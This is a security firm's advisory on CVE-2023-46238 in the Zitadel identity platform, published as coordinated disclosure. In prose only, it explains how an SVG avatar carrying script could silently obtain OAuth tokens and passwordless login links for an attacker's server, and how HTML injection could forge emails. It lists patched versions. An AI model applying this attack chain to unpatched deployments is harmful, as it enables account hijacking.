cythera-logo-darkmode
Are you experiencing a security incident?
Incident Response
Assess & Improve
Detect & Respond
Protect & Secure
Advise & Empower
Resources
Case Studies
Real-world examples
Articles
In-depth insights
Advisories
Newly discovered threats
About us
Leadership Team
Meet the experts
Events
Join upcoming events
Award & Certifications
Industry recognitions
Vendor Partners
Trusted vendors
Talk to an expert
Service Category
Services
Popular Services
Employee Cyber Training & Awareness
Train smart and stay secure
Advisory
Secure smarter with strategic security advisory
Managed Protection
Always-on protection. Smarter security
Security Architecture
Security that drives real results, cloud to full stack
Digital Forensics & Incident Response
DFIR experts, ready when you need them.
Cyber Threat Intelligence
Real time insights from Cassini CTI
Managed Detection & Response
Our experts watch, so you don’t have to.
Certification & Accreditation
Get certified with ease
Audit & Assurance
Audits you trust. Assurance that drives action.
Governance, Risk & Compliance
Simplfy compliance, strengthen protection
Cyber Maturity Assessments
Level up your cyber security game
Penetration Testing
Penetration testing that spots weaknesses
Case Studies
    
Articles
    
Advisories
    
Web Filter, CASB & DLP (Cloud Access Security Broker & Data Loss Prevention)
Web Application Penetration Testing
Vulnerability Management
Vulnerability Assessment
vITSM
Virtual Security Architect (vSecArch)
vCISO
System Security Plan
System Architecture, Design & Implementation
Strategic Security Consulting
SWIFT CSCF
Specialist Testing
Source Code Review
Social Engineering & Phishing
Security Policy and Standard Development
Security Incident Response Testing
Security Awareness Training
Secure Access Service Edge (SASE)
Risk Management
Risk Assessment
Red Teaming
Purple Teaming
NIST CSF Maturity Uplift
Payment Card Industry (PCI)
OT/SCADA Network Penetration Test
NIST CSF Assessment
ISO 27001
Internal Penetration Testing
Incident Response Tabletop Exercise
Incident Response
Forensics
External Penetration Testing
Executive & Board Reporting
Executive and Board Security Governance Training
Essential Eight Assessment
Endpoint Protection
Email Security
DevSecOps Review & Implementation
Denial of Service (DoS) Testing
Design Reviews
Dark Web Monitoring
Controls Validation Audit
Continuous Certification
Compliance Programme Management
Configuration Reviews
Cloud Security Configuration
Cloud Posture & Security
CIS Critical Controls Assessment
Automated Patch Management
CI/CD Health Check
Artificial Intelligence (AI) Penetration Test
All of Government Marketplace
Advanced OSINT Training Course
Application Penetration Tests
NIST CSF Assessment
ISO 27001
Internal Penetration Testing
External Penetration Testing
Essential Eight Assessment
Denial of Service (DoS) Testing
Dark Web Monitoring
cythera-logo-darkmode
Advise & Empower
Explore Solutions
Protect & Secure
Explore Solutions
Detect & Respond
Explore Solutions
Assess & Improve
Explore Solutions
Resources
Articles
Advisories
About Us
Explore Bastion
Leadership Team
Events
Award & Certifications
Our Community
Vendor Partners
Employee Cyber Training & Awareness
Advisory
Managed Protection
Security Architecture
Digital Forensics & Incident Response
Cyber Threat Intelligence
Managed Detection & Response
Certification & Accreditation
Audit & Assurance
Governance, Risk & Compliance
Cyber Maturity Assessments
Penetration Testing
Popular Services
NIST CSF Assessment
ISO 27001
Internal Penetration Testing
Incident Response
Talk to an expert
Resources
About Us
Advisories
>
Zitadel Exploit Enables One-Click Account Compromise
Cythera Cyber Security

Zitadel Exploit Enables One-Click Account Compromise

Stored XSS combined with email injection vulnerabilities may be used to silently hijack user accounts, bypassing traditional alerts and authentication mechanisms.
Talk to an expert

Introduction

Zitadel is an open-source identity platform designed to streamline identity management so developers can concentrate on core business features. Supporting B2B, B2C, and machine-to-machine (M2M) use cases, Zitadel delivers key capabilities out of the box — including hosted login, passwordless and multi-factor authentication, single sign-on (SSO), OpenID Connect, SAML, fine-grained authorisation, and a highly extensible API-driven architecture with support for custom code actions.

The Vulnerability

During an assessment, Cythera uncovered a stored Cross-Site Scripting (XSS) vulnerability in Zitadel. This issue allowed attackers to initiate a silent account takeover using a one-click payload. With a CVSS 3.1 score of 8.7 (High), the vulnerability was registered under CVE-2023-46238. Zitadel worked cooperatively with Cythera during disclosure, ensuring swift triage and mitigation.

Vulnerability Discovery

During an assessment of a Zitadel deployment, it was found that SVG files could be uploaded as user avatars. While Zitadel applies a strict Content Security Policy (CSP) on its main dashboard pages, the endpoint responsible for serving uploaded files had no CSP restrictions. Additionally, these files were served without a header that would normally force them to be downloaded, meaning they could be displayed and executed within the browser, under Zitadel’s domain.

Further research revealed that if JavaScript was executed in this context, it could interact with Zitadel’s authentication system. Specifically, it could request a new OAuth token, and then use that token to generate a passwordless login link. This link could then be silently sent to an attacker-controlled server, effectively enabling a stealthy account takeover.

Zitadel was also found to allow emails to be sent with highly customisable content. By injecting crafted HTML into user input fields (like “Family Name”), attackers could manipulate the layout and content of emails. This technique could be used to deliver malicious links to unsuspecting users via trusted-looking emails, making the exploit even more effective. The Zitadel team acknowledged the email injection as a known vulnerability that was not newly introduced (commonly referred to as an “N-day” issue).

Proof of Concepts

Silent Account Takeover

A proof-of-concept demonstrated that:

  • An attacker could upload an SVG file containing JavaScript as a user avatar.
  • When this image was viewed, the JavaScript would initiate an OAuth authorisation process, obtain an access token, and then use Zitadel’s own APIs to create a passwordless login link tied to the victim’s account.
  • This link would then be sent to a server controlled by the attacker, allowing them to log in without a password.
  • This attack did not rely on tricking the user to click anything — the process happened silently once the image was loaded.
  • A simpler version of this exploit could be used to exfiltrate only the OAuth access token, which would also allow the attacker to act as the user.

Email Injection

It was also demonstrated that Zitadel’s email templates could be manipulated using HTML inserted into fields like the user’s “Family Name”. For instance, adding certain HTML tags could terminate sections of the email early or hide legitimate content, allowing the attacker to craft an email that appears entirely normal and trustworthy to the recipient — while actually containing only attacker-controlled content.

Potential Impact

These vulnerabilities combined could allow for:

  • Complete account takeover, without any password knowledge or user interaction
  • Delivery of malicious emails using Zitadel’s own infrastructure
  • Phishing-like attacks that appear to come from a legitimate source

How to Fix

Zitadel has resolved these issues. Users should update to one of the patched versions:

  • Version 2.28.2
  • Version 2.39.2

More information is available on Zitadel’s official security advisory page.

Vulnerability Disclosure Timeline

  • 12 October 2023 – Stored XSS vulnerability reported to the vendor
  • 13 October 2023 – Vendor responded to the initial report
  • 13 October 2023 – Email injection vulnerability also disclosed
  • 16 October 2023 – Vendor acknowledged email injection and requested proof of impact for the XSS
  • 19 October 2023 – Proof-of-concept for silent account takeover submitted
  • 19 October 2023 – Vendor acknowledged the PoC and started further investigation
  • 25 October 2023 – Vendor continued assessing the impact
  • 26 October 2023 – Issues were patched, a security advisory was published, and a CVE identifier was issued

CIO
Government Agency
Cythera operates as an extension of our team. When we call there is an immediate response and the person that answers our call is the person that resolves our issue. Cythera understands our network, and more importantly, has taken the time to understand our business. We find it easy to work with Cythera. They are approachable, flexible and have taken the time to build deep relationships with our team. It is a partnership and friendship. Cythera’s personalised, highly specialised services makes all the difference. We would recommend Cythera to anyone in the industry looking for a managed services partner.
Expert methods

We have the tools to pinpoint risks

Whether it’s hidden vulnerabilities or patterns you might miss, we help you stay one step ahead and make confident, informed decisions. Understand how our services can help your business uncover critical risks

Talk to an expert
Employee Cyber Training & Awareness
Your people are your first line of defence. Our cyber training builds awareness sharpens instincts and turns everyday staff into assets.
Advisory
When clarity is critical and stakes are high, our advisory services deliver strategic, executive-level security expertise that empowers decision-making and resilient operations.
Advise & Empower
Protect & Secure
Detect & Respond
Assess & Improve
Back to top
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Dark
Resources
Case StudiesArticlesAdvisoriesOur ISO 27001 Certificate
About UsLeadership TeamEventsAwards & CertificationsOur CommunityVendor Partnership
Are you experiencing a security breach?
Incident Response
1300 298 437
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
© Copyright 2025. All rights reserved